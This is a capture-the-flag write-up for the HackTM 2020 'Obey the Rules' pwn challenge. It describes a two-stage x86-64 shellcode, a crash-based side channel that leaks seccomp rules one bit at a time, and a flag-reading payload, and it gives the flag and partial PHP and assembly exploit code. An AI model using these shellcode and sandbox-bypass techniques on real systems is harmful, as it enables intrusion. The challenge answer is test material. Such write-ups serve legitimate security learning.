# Obey the Rules - HackTM 2020 Quals
## Introduction
Obey the Rules is a pwn task.
The goal of this task is to read a file, `/home/pwn/flag.txt`. The binary
provided will execute a user-provided shellcode, but it is protected by seccomp
rules. The rules are not given to challengers.
## 9-bytes Shellcode
The binary prints an ASCII art of a book, and asks to the user whether they obey
or not.
The user's input is read in a 11-bytes buffer. It is then compared against `Y`
with `strcmp`. If it does not, (i.e. if the buffer does not start with `Y\x00`)
the process will execute `/bin/sh`. This will result in the process being killed
due to the seccomp filters.
If the buffer does start with `Y\x00`, the first NULL byte (found with `strlen`)
is replaced with an other `Y`, and the buffer is executed as a shellcode.
When the shellcode is called, `rax` points to the begining of the rwx-mapped
memory area that holds the shellcode. This can be leveraged to overwrite the
shellcode with a longer shellcode using `read`.
0000: 59 pop rcx // first Y
0001: 59 pop rcx // NULL, replaced by Y
0002: 31 ff xor edi,edi // fd = 0
0004: 48 96 xchg rsi,rax // buf = map
0006: 31 c0 xor eax,eax // syscall = 0 (SYS_read)
0008: 0f 05 syscall
000A: 90 nop
## Leaking the seccomp rules
With a longer shellcode, it is possible to issue any syscall. However, almost
every syscalls appear to be blocked by the seccomp rules, including `write`.
It is possible to exfiltrate a bit by terminating the program, either with a
segmentation fault (jumping to invalid memory) or with a trap to debugger
(`int3`, invoking an uncaught `SIGTRAP`)
This oracle can be used to exfiltrate the content of the seccomp rules that
are referenced in a global variable.
The disassembled BPF program used as a filter is the following:
l0: ld [4]
l1: jeq AUDIT_ARCH_X86_64, l2, l12
l2: ld [0]
l3: jge #0x40000000, l12, l4
l4: jeq SYS_open, l11, l5
l5: jeq SYS_exit, l11, l6
l6: jeq SYS_read, l7, l12
l7: ld [16]
l8: jeq #0x3, l9, l11
l9: ld [24]
l10: jeq #0x602888, l11, l12
l11: ret #0x7fff0000
l12: ret #0
This filter allows:
1. open
2. exit
3. read when `fd` is not 3
4. read when `fd` is 3, and `buf` is `0x602888`
## Leaking the flag
The seccomp filters only allows the flag to be read at `0x602888` (`fd` == 3).
It is not possible to open a 4th file due to system restrictions set before
creating the process. (à la `ulimit`)
It is possible to run a shellcode that will open the flag, read it at the
correct location and use the script used previously to exfiltrate the flag.
The final shellcode can be found at `shellcode.S` in the appendices. The final
script in `pwn.php` as well as additional scripts that were used to convert
formats (binary digits, BPF, and ascii)
**Flag**: `HackTM{kn0w_th3_rul3s_we11_s0_y0u_c4n_br34k_th3m_EFFECTIVELY}`
## Appendices
### pwn.php
$t->expectLine(" === OBEY THE RULES 1.0 ===");
$t->expectLine(" --------------------------");
$t->expectLine(" __________________ __________________");
$t->expectLine(".-/| \ / |\-.");
$t->expectLine("|||| NEW RULES: | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("|||| | ||||");
$t->expectLine("||||__________________ | __________________||||");
$t->expectLine(" >> Do you Obey? (yes / no)");
$payload = "Y\x00"; // pop rcx, pop rcx
$payload .= "\x31\xFF"; // xor edi, edi
$payload .= "\x48\x96"; // xchg rsi, rax
$payload .= "\x31\xC0"; // xor eax, eax (SYS_read)
$payload .= "\x0F\x05"; // syscall
$payload = str_pad($payload, 0x0B, "\x90");
$shellcode = file_get_contents("shellcode");
$shellcode = str_replace("BBBB", pack("V", $argv[1]), $shellcode);
$payload .= str_repeat("\x90", strlen($payload));
$payload .= $shellcode;
$line = $t->readLine();
if($line === "Segmentation fault (core dumped)")
echo "0";
else if($line === "Trace/breakpoint trap (core dumped)")
echo "1";
echo "?";
echo "\n";
### shellcode.S
.intel_syntax noprefix
.global _start
lea rdi, [rip + filename]
mov rsi, 0
mov rax, 0 // SYS_open
// rax == 3
mov rdi, rax
mov rsi, 0x602888 // backdoor
mov rdx, 0x80
mov rax, SYS_read
// placeholder
mov ecx, 0x42424242
// al = target[bit >> 3]
mov rdi, rcx
shr rdi, 3
add rdi, 0x602888
mov al, byte ptr [rdi]
and cl, 7
shr al, cl
and al, 1
jnz true
push 0
filename: .asciz "/home/pwn/flag.txt"
### convert.php